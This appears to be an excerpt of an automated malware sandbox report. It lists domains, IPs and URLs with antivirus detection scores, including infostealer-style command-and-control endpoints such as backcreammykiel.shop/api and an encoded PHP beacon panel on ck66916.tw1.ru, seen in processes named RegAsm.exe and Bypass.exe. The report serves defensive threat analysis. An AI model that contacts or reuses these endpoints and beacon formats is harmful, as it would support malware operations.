http://ocsp.entrust.net02	0%	Avira URL Cloud	safe
http://www.entrust.net/rpa03	0%	Avira URL Cloud	safe
http://ck66916.tw1.ru/@==gbJBzYuFDT	2%	Virustotal		Browse
http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=QX9JSUNJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W	0%	Avira URL Cloud	safe
http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://www.entrust.net/rpa03	0%	Virustotal		Browse
facilitycoursedw.shop	12%	Virustotal		Browse
https://duckduckgo.com/?q=	0%	Virustotal		Browse
http://aia.entrust.net/ts1-chain256.cer01	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
computerexcudesp.shop	0%	Avira URL Cloud	safe
doughtdrillyksow.shop	0%	Avira URL Cloud	safe
disappointcredisotw.shop	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://ipinfo.io	0%	Avira URL Cloud	safe
doughtdrillyksow.shop	13%	Virustotal		Browse
http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W	0%	Avira URL Cloud	safe
http://ck66916.tw1.ru	0%	Avira URL Cloud	safe
disappointcredisotw.shop	9%	Virustotal		Browse
http://ck66916.tw1.ru/	0%	Avira URL Cloud	safe
https://ipinfo.io	0%	Virustotal		Browse
http://aia.entrust.net/ts1-chain256.cer01	0%	Virustotal		Browse
https://backcreammykiel.shop/B	100%	Avira URL Cloud	malware
http://ck66916.tw1.ru/L1nc0In.php?iUu=8R7Isg&ee5ae8efe50125d60098b1ca132932bc=49479fbd79a245ee458d40f1dd85aa54&650a0c21718513cd4feada722441e9dc=gMjRGOkJjYmNWNxMmYiZzMiVTN1UmNhBzNzMTZldTY4kTYxUWNwQmN&iUu=8R7Isg	0%	Avira URL Cloud	safe
leafcalfconflcitw.shop	100%	Avira URL Cloud	malware
http://ck66916.tw1.ru/	3%	Virustotal		Browse
http://ck66916.tw1.ru	3%	Virustotal		Browse
https://backcreammykiel.shop:443/api	100%	Avira URL Cloud	malware
publicitycharetew.shop	0%	Avira URL Cloud	safe
https://backcreammykiel.shop/s	100%	Avira URL Cloud	malware
computerexcudesp.shop	14%	Virustotal		Browse
https://backcreammykiel.shop:443/api	17%	Virustotal		Browse
http://crl.entrust.net/ts1ca.crl0	0%	Avira URL Cloud	safe
backcreammykiel.shop	100%	Avira URL Cloud	malware
https://backcreammykiel.shop/l	100%	Avira URL Cloud	malware
publicitycharetew.shop	15%	Virustotal		Browse
http://crl.entrust.net/ts1ca.crl0	0%	Virustotal		Browse
leafcalfconflcitw.shop	9%	Virustotal		Browse
http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ	0%	Avira URL Cloud	safe
http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13	0%	Avira URL Cloud	safe
https://backcreammykiel.shop/	100%	Avira URL Cloud	malware
backcreammykiel.shop	8%	Virustotal		Browse
bargainnygroandjwk.shop	0%	Avira URL Cloud	safe
https://backcreammykiel.shop/l	0%	Virustotal		Browse
https://www.entrust.net/rpa0	0%	Avira URL Cloud	safe
injurypiggyoewirog.shop	0%	Avira URL Cloud	safe
https://backcreammykiel.shop/	0%	Virustotal		Browse
injurypiggyoewirog.shop	9%	Virustotal		Browse
bargainnygroandjwk.shop	9%	Virustotal		Browse
https://www.entrust.net/rpa0	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipinfo.io	34.117.186.192	true	false	0%, Virustotal, Browse	unknown
backcreammykiel.shop	104.21.90.18	true	true	8%, Virustotal, Browse	unknown
ck66916.tw1.ru	92.53.96.121	true	true	3%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://backcreammykiel.shop/api	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W	true	Avira URL Cloud: safe	unknown
http://ck66916.tw1.ru/@==gbJBzYuFDT	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
facilitycoursedw.shop	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=QX9JSUNJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W	true	Avira URL Cloud: safe	unknown
http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W	true	Avira URL Cloud: safe	unknown
computerexcudesp.shop	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
doughtdrillyksow.shop	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
disappointcredisotw.shop	true	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W	true	Avira URL Cloud: safe	unknown
http://ck66916.tw1.ru/L1nc0In.php?iUu=8R7Isg&ee5ae8efe50125d60098b1ca132932bc=49479fbd79a245ee458d40f1dd85aa54&650a0c21718513cd4feada722441e9dc=gMjRGOkJjYmNWNxMmYiZzMiVTN1UmNhBzNzMTZldTY4kTYxUWNwQmN&iUu=8R7Isg	true	Avira URL Cloud: safe	unknown
leafcalfconflcitw.shop	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://ipinfo.io/	false	URL Reputation: safe	unknown
publicitycharetew.shop	true	15%, Virustotal, Browse Avira URL Cloud: safe	unknown
backcreammykiel.shop	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ	true	Avira URL Cloud: safe	unknown
bargainnygroandjwk.shop	true	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
injurypiggyoewirog.shop	true	9%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://backcreammykiel.shop/apiPK	RegAsm.exe, 0000000D.00000002.1976836408.000000000390D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
